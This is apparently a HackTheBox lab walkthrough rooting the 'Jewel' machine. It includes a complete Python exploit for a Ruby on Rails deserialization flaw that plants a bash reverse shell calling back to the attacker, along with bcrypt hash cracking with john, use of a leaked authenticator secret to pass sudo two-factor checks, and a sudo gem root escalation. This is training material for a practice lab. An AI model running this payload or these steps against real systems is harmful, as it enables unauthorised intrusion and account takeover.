Jewel HackTheBox WalkThrough

This is Jewel HackTheBox machine walkthrough. In this write-up, I have demonstrated step-by-step how I rooted Jewel HTB machine. Before starting let us know something about this machine. It is a Linux
machine with IP address 10.10.10.211
and difficulty Medium
assigned by its maker.
First of all connect your PC with VPN
and make sure your connectivity with Jewel machine by pinging its IP 10.10.10.211. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning
give us an idea how we have to proceed further. Like, it helps in banner grabbing
the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap
for this task and the result is given below:-
Scanning
$ sudo nmap -sC -sV -oN jewel_scan.nmap 10.10.10.211

Nmap revealed that port 22, 8000 and 8080 are open. SSH
on port 22
, Apache2
on port 8000
and nginx
webserver on port 8080
are running. Nmap script http-generator
gave information that this website is using gitweb 2.20.1
interface. Since apache2 is running on port 8000 so there will be some website at URL http://10.10.10.211:8000 and since nginx is running on port 8080 therefore there will also be some website running at the URL http://10.10.10.211:8080.
I begin by enumerating on port 8000 because websites have more attack surfaces. Searched gitweb 2.20.1
for available exploits using searchsploit
but found no exploits. Ongoing to URL https://10.10.10.211:8000 got redirected to http://10.10.10.211:8000/gitweb/ . After some enumeration found a file named bd.sql
at URL http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD. Hashes of user bill
and jennifer
are present in this file. Saved them to a file to crack using john
and rockyou.txt
. The extracted hashes are
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy

Searched online the type of this hash is it and got information it is bcrypt
hash.
Identifying Hash Type

Then tried to crack them using john
but couldn’t crack any of them. After further enumeration couldn’t not find any way to get into the jewel machine. Then moved ahead to enumerate on port 8080. As Phusion Passenger 6.0.6
, service is listed by nmap so tried to search for available exploits for this using searchsploit
but again found nothing. Ongoing to URL http://10.10.10.211:8080/login found a login page
. Tried some basic SQL injection
but not vulnerable. There is also a signup page
so, registered an account by the creds
Username : test1
Email : [email protected]
Password : test1
After logging with the creds [email protected]
: test1
, under profile
menu tried to test for some injection attacks at username field (because it is the only field which we can manipulate) but could not get success. Till now I didn’t found any potential vector to get into the Jewel machine.
After getting some hint from the HTB forum and internet found that the webserver which is using ruby on rails version < 5.2.4.3 is vulnerable to deserialization attack
. The current version of the ruby and ruby on rail can be found at the URL http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741

The working PoC can be found at GitHub. And more information about this vulnerability can be found at Google Forum.
You can follow the steps as given in the GitHub PoC. I tried to exploit this vulnerability using the above method and could easily exploit the vulnerability as given in above GitHub PoC. For simplicity @randomname83
has created a python script to get user shell. All you have to do is to copy the script code and paste it in a file named rev.py
and run the script as shown in the screenshot after starting a netcat listener
. The script code is
import requests
import re
import sys
URL='http://{}:8080'.format(sys.argv[1])
username='myuser4'
password='mypass4'
email='[email protected]'
if len(sys.argv) != 4:
print("specify target IP, your IP and port: python3 rev.py 10.10.xx.xx 9001")
exit(0)
s = requests.Session()
resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'
token = re.search(rx,resp.text).group(1)
# create user
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)
# login
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)
rx = r'href="/users/(.*)"'
user_id = re.search(rx,resp.text).group(1)
# rev shell
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)
s.get(URL + '/articles')
Getting User Shell
$ python3 rev.py 10.10.10.211 10.10.14.19 1234
$ nc -nvlp 1234
$ id && whoami

We got a shell. Let us upgrade the shell to fully qualified Linux shell so that we can execute advanced Linux command.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm

We have upgraded our shell. Let us capture User Flag.
Capture User Flag
$ cat user.txt

Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector
. During initial enumeration ran command $sudo -l
to check if any special privilege is given to user bill
but it requires password
. Then ran linpeas.sh
. (a post exploitation enumeration script) to find privilege escalation vector. Linpeas found two password hashes inside the file dump_2020-08-27.sql
and bd.sql
present at the directory /var/backups/
and /home/bill/blog/
respectively. The hashes are
jennifer
: $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd5I02OnmkKnD3zA6MqMrzLKz0jeDO
Unknown
: $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
On listing the content of file dump_2020-08-27.sql
got another hash of user bill which is
bill
: $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
We have now a total of three hashes to crack. Among them one is for user jennifer which doesn’t exist and second’s user is not known. So we are left with one hash of bill.

Tried to crack it using john and could easily crack it.
Cracking Hash
$ vi creds.hash
$ sudo john --format=bcrypt creds.hash --wordlist=/usr/share/wordlists/rockyou.txt
$ sudo john creds.hash --show

John
has successfully cracked the hash and the credential is bill
: spongebob
. Tried to ran the command $sudo -l
again to check any special privilege given to user bill, it asked a Verification Code
after entering the password
. It appears that there is some two factor authentication
enabled for normal users to run $sudo -l
command. After some more enumeration got a hidden file google_authenticator
inside the home directory. There is secret code inside this file which is 2UQI3R52WFCLE6JTLDCSJYMJH4
, this code can be used to generate OTP
. I have used authenticator addons
for Firefox to generate OTP using this secret key.

Installed authenticator by just clicking this Firefox URL.

After installing the addons click on +
> Manual Entry
> Issuer: Anything
& Secret : 2UQI3R52WFCLE6JTLDCSJYMJH4
> OK
Copy the OTP
and type the command $sudo -l
then password spongebob
then enter OTP as Verification code
.
$ sudo -l
~spongebob
~622463

So $sudo -l
revealed that user bill can run all the command using gem binary. If you get such type of output like user can run (ALL : ALL) /usr/bin/gem
then best place to get your exploit is GTFOBIN (Remember this). After going to this URL you can find the exploit to escalate privilege.

Finding PrivEsc Vector
So here our privilege escalation vector is Sudo Right Exploitation
to get root. Let us get root shell and capture root flag.
Getting Root Shell
$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# whoami && id

Capture Root Flag
#cat /root/root.txt

This was how I rooted to the Jewel HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. Want to give any suggestion about the write-up feel free to write us at [email protected].